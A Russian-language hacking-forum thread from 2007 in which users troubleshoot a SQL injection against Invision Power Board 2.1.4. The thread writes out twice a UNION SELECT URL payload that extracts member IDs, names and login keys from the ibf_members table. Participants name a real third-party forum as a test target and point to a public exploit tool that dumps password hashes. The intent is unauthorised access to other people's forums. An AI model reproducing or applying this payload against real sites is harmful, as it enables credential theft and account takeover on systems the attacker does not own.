Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос по Ipb (https://forum.antichat.xyz/showthread.php?t=36423)

AlexCRC 26.03.2007 18:18
Вопрос по Ipb
 
Эсть IPB 2.1.4
Уязвим.
Вот такая ссылка:
PHP код:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20WHERE%20id=1%20/* 
выдает цитату на 58 пост.
И все.
Префикс ibf_ (точно!
PHP код:
index.php?act=task&ck=
проверено =))) )

В чем может быть трабла?

Iceangel_ 26.03.2007 19:32
Цитата:
Сообщение от AlexCRC
Эсть IPB 2.1.4
Уязвим.
Вот такая ссылка:
PHP код:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20WHERE%20id=1%20/* 
Думаю оффтоп, но все-таки скажу в конце ссылки /* нету...

AlexCRC 26.03.2007 19:36
То я видимо часть не скопировал. она эсть.

Цитата:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666 ) union select 1,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(5 8),member_login_key),1,1,1,1,1,1,1,1,1 from ibf_members WHERE id=1 /*

Iceangel_ 26.03.2007 19:38
Кинь ссылку в ПМ, посмотрю что можно сделать...

AlexCRC 26.03.2007 20:07
Проверил на другом форуме - тоже самое :'(

и еще на одном :(

AlexCRC 27.03.2007 17:04
идей нет? :(

x_zStas_x 27.03.2007 19:04
дай ссылку на какой-нить форум!

AlexCRC 27.03.2007 19:18
к примеру http://www.gameforums.jino-net.ru

x_zStas_x 27.03.2007 19:43
_ttp://www.milw0rm.com/exploits/2010
сполит с гуи канает на том :) просто лень инъекцию мутить :)

AlexCRC 27.03.2007 21:40
А как с ним работать?
Пишет что форум уязвим.
При попытке узнать префикс - ошибка. но префикс то ibf_
При нажатии "Get data from database" все время получаю разные хеши. В чем дело?


Время: 00:56
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице